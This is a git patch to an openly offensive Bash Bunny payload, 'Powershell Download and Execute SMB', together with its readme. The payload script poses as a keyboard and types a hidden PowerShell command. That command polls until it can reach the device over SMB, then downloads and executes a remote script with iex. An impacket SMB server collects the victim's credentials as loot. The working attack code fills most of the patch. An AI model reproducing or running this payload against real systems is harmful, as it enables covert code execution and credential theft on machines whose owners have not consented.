From 4d9bfeedd397db83a3d7dd0ac7fcd050dfe166d2 Mon Sep 17 00:00:00 2001 From: hink Date: Tue, 2 May 2017 20:41:44 -0500 Subject: [PATCH] Updated psh_DownloadExecSMB payload for fw v1.2 (#209) * Powershell SMB Delivery * fixed smbserver.py call * Combined ATTACK MODES, improved SMB check * version fix --- .../execution/psh_DownloadExecSMB/payload.txt | 33 +++++++------------ .../execution/psh_DownloadExecSMB/readme.md | 9 +++-- 2 files changed, 16 insertions(+), 26 deletions(-) diff --git a/payloads/library/execution/psh_DownloadExecSMB/payload.txt b/payloads/library/execution/psh_DownloadExecSMB/payload.txt index d04dacfa..b05f2e2d 100644 --- a/payloads/library/execution/psh_DownloadExecSMB/payload.txt +++ b/payloads/library/execution/psh_DownloadExecSMB/payload.txt @@ -2,11 +2,11 @@ # # Title: Powershell Download and Execute SMB # Author: LowValueTarget -# Version: 1.0 +# Version: 1.2 # Category: Powershell # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, RNDIS_ETHERNET -# Firmware: >= 1.1 +# Firmware: >= 1.2 # # Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot. # Ensure psh.txt exists in payload directory @@ -15,17 +15,19 @@ # # | Attack Stage | Description | # | ------------------- | ------------------------------| -# | Stage 1 | HID | -# | Stage 2 | RNDIS_ETHERNET | -# | Stage 3 | Delivering powershell payload | +# | Stage 1 | Powershell | +# | Stage 2 | Delivering powershell payload | # +ATTACKMODE RNDIS_ETHERNET HID + # SETUP LED SETUP REQUIRETOOL impacket # required for SMB server GET SWITCH_POSITION GET TARGET_HOSTNAME +GET HOST_IP PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION # Check for psh.txt @@ -48,30 +50,19 @@ mkdir -p ${LOOTDIR}/${HOST}-$COUNT # Log file LOGFILE=psh_smb.log -# Prevent premature access to SMB server -echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all - # Start SMB Server mkdir -p /loot python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} & -# STAGE 1 - HID +# STAGE 1 - Powershell LED STAGE1 -ATTACKMODE HID -RUN WIN "powershell -WindowStyle Hidden \"while (\$TRUE) {If (Test-Connection 172.16.64.1 -count 1 -quiet) {iex (New-Object Net.WebClient).DownloadString('\\\172.16.64.1\s\psh.txt');New-Item \\\172.16.64.1\s\COMPLETE -ItemType file;exit}}\"" +RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\"" # Remove tracks in the psh payload if you wish -# STAGE 2 - ETHERNET/SMB -LED STAGE2 -ATTACKMODE RNDIS_ETHERNET - -# Re-enable ICMP ping to trigger the powershell stager -echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all - -# STAGE 3 - Wait until payload retrieved +# STAGE 2 - Wait until payload retrieved # Wait until payload is retrieved -LED STAGE3 +LED STAGE2 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done # CLEANUP @@ -81,6 +72,6 @@ LED CLEANUP mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT rm /loot/${LOGFILE} # Sync file system -sync; sleep 1; sync +sync LED FINISH diff --git a/payloads/library/execution/psh_DownloadExecSMB/readme.md b/payloads/library/execution/psh_DownloadExecSMB/readme.md index 1a57f61d..42c29490 100644 --- a/payloads/library/execution/psh_DownloadExecSMB/readme.md +++ b/payloads/library/execution/psh_DownloadExecSMB/readme.md @@ -2,11 +2,11 @@ ## Powershell Download and Execute SMB * Author: LowValueTarget -* Version: Version 1.0 +* Version: Version 1.2 * Target: Windows XP SP3+ (Powershell) * Category: Powershell * Attackmodes: HID, RNDIS_Ethernet -* Firmware: >= 1.1 +* Firmware: >= 1.2 ## Description @@ -21,6 +21,5 @@ Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer | Attack Stage | Description | | ------------------- | ------------------------------| -| Stage 1 | HID | -| Stage 2 | RNDIS_ETHERNET | -| Stage 3 | Delivering powershell payload | \ No newline at end of file +| Stage 1 | Powershell | +| Stage 2 | Delivering powershell payload | \ No newline at end of file